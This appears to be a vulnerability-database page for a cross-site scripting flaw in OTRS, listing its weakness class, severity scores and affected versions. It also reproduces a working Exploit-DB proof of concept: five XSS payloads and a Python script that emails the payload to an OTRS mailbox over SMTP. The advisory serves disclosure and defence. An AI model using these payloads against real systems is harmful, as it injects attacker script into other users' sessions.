Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-79 |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 20359
Publication date : 2012-08-07 22h00 +00:00
Author : loneferret
EDB Verified : Yes
#!/usr/bin/python
'''
Author: loneferret of Offensive Security
Product: OTRS Open Technology Real Services
Version: 3.1.4 (Windows)
Vendor Site: http://www.otrs.com/en/
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response other than auto-reply from vendor
08 Aug 2012: Public Disclosure
22 Aug 2012: Update from CERT: vulnerability patched
http://www.kb.cert.org/vuls/id/582879
http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-01/
Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9
Injection Point: Body
Injection Payload(s):
1: <DIV STYLE="width: expression(alert('XSS'));">
2: exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
3: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
4: <XSS STYLE="xss:expression(alert('XSS'))">
5: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
'''
import smtplib, urllib2
payload = """<DIV STYLE="width: expression(alert('XSS'));">"""
def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From:
[email protected]\n"
msg += "To:
[email protected]\n"
msg += 'Date: Today\r\n'
msg += "Subject: Offensive Security\n"
msg += "Content-type: text/html\n\n"
msg += "XSS" + payload + "\r\n\r\n"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()
username = "
[email protected]"
password = "123456"
dstemail = "
[email protected]"
frmemail = "
[email protected]"
smtpsrv = "172.16.84.171"
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)
Products Mentioned
Configuraton 0
Otrs>>Otrs >> Version 2.4.0
Otrs>>Otrs >> Version 2.4.0
Otrs>>Otrs >> Version 2.4.0
Otrs>>Otrs >> Version 2.4.0
Otrs>>Otrs >> Version 2.4.0
Otrs>>Otrs >> Version 2.4.0
Otrs>>Otrs >> Version 2.4.1
Otrs>>Otrs >> Version 2.4.2
Otrs>>Otrs >> Version 2.4.3
Otrs>>Otrs >> Version 2.4.4
Otrs>>Otrs >> Version 2.4.5
Otrs>>Otrs >> Version 2.4.6
Otrs>>Otrs >> Version 2.4.7
Otrs>>Otrs >> Version 2.4.8
Otrs>>Otrs >> Version 2.4.9
Otrs>>Otrs >> Version 2.4.10
Otrs>>Otrs >> Version 2.4.11
Otrs>>Otrs >> Version 2.4.12
Configuraton 0
Otrs>>Otrs >> Version 3.0.0
Otrs>>Otrs >> Version 3.0.0
Otrs>>Otrs >> Version 3.0.0
Otrs>>Otrs >> Version 3.0.0
Otrs>>Otrs >> Version 3.0.0
Otrs>>Otrs >> Version 3.0.0
Otrs>>Otrs >> Version 3.0.0
Otrs>>Otrs >> Version 3.0.1
Otrs>>Otrs >> Version 3.0.2
Otrs>>Otrs >> Version 3.0.3
Otrs>>Otrs >> Version 3.0.4
Otrs>>Otrs >> Version 3.0.5
Otrs>>Otrs >> Version 3.0.6
Otrs>>Otrs >> Version 3.0.7
Otrs>>Otrs >> Version 3.0.8
Otrs>>Otrs >> Version 3.0.9
Otrs>>Otrs >> Version 3.0.10
Otrs>>Otrs >> Version 3.0.11
Otrs>>Otrs >> Version 3.0.12
Otrs>>Otrs >> Version 3.0.13
Otrs>>Otrs >> Version 3.0.14
Configuraton 0
Otrs>>Otrs >> Version 3.1.0
Otrs>>Otrs >> Version 3.1.1
Otrs>>Otrs >> Version 3.1.2
Otrs>>Otrs >> Version 3.1.3
Otrs>>Otrs >> Version 3.1.4
Otrs>>Otrs >> Version 3.1.5
Otrs>>Otrs >> Version 3.1.6
Otrs>>Otrs >> Version 3.1.7
Otrs>>Otrs >> Version 3.1.8
Configuraton 0
Otrs>>Otrs_itsm >> Version 2.1.0
Otrs>>Otrs_itsm >> Version 2.1.1
Otrs>>Otrs_itsm >> Version 2.1.2
Otrs>>Otrs_itsm >> Version 2.1.3
Otrs>>Otrs_itsm >> Version 2.1.4
Otrs>>Otrs_itsm >> Version 3.0.0
Otrs>>Otrs_itsm >> Version 3.0.1
Otrs>>Otrs_itsm >> Version 3.0.2
Otrs>>Otrs_itsm >> Version 3.0.3
Otrs>>Otrs_itsm >> Version 3.0.4
Otrs>>Otrs_itsm >> Version 3.0.5
Otrs>>Otrs_itsm >> Version 3.1.0
Otrs>>Otrs_itsm >> Version 3.1.1
Otrs>>Otrs_itsm >> Version 3.1.2
Otrs>>Otrs_itsm >> Version 3.1.3
Otrs>>Otrs_itsm >> Version 3.1.4
Otrs>>Otrs_itsm >> Version 3.1.5
References